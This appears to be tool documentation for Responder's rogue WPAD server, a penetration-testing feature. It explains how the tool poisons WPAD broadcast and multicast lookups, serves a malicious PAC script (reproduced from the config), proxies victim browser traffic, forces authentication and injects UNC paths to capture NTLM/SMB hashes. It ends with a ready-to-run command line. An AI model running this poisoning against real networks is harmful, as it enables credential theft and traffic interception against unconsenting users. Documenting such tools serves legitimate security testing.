Responder WPAD Server

WPAD stands for Web Proxy Auto-Discovery or Proxy Auto-Configuration (PAC).

This protocol was implemented on Internet Explorer 5.0, and the concept is to auto-configure local proxy servers on the user browser.

There is several way to configure a WPAD:

Manually insert a WPAD server in IE -> Options -> Connection Settings -> Lan Settings.
DHCP options 252.
Multicast/Broadcast WPAD lookup.

Responder takes advantage of that and effectively poison WPAD broadcast/multicast queries and redirect the victim browser to its WPAD server.

Here there is two scenario:

Force authentication when serving the WPAD file (Responder switch -F) and grab hash.
- Once the authentication has been grabbed, all browser request will be proxy-ed by Responder.
Just serve the file, then proxy all browser requests.

Responder WPAD script is specified in Responder.conf and should be changed for your needs (at least the hardcoded name "ProxySrv"):

WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}

This function contains the following directives:

Use a proxy server for all connections.
Responder proxy server is set to ProxySrv:3141 and ProxySrv:3128
For any *.ProxySrv requests or if the request is for localhost/127.0.0.1, don't use the proxy.
If this proxy server fails for whatever reason, then access the website directly.

Once the requests goes through Responder proxy, a UNC inside a tag is inserted on all requests to grab SMB hashes. This payload can be changed in Responder.conf with the setting "HTMLToInject =".

Responder WPAD proxy server gets activated by providing the "-w" command line switch.

Forcing WPAD file authentication is with the "-F" command line switch.

Example:

./Responder.py -I eth0 -rFwv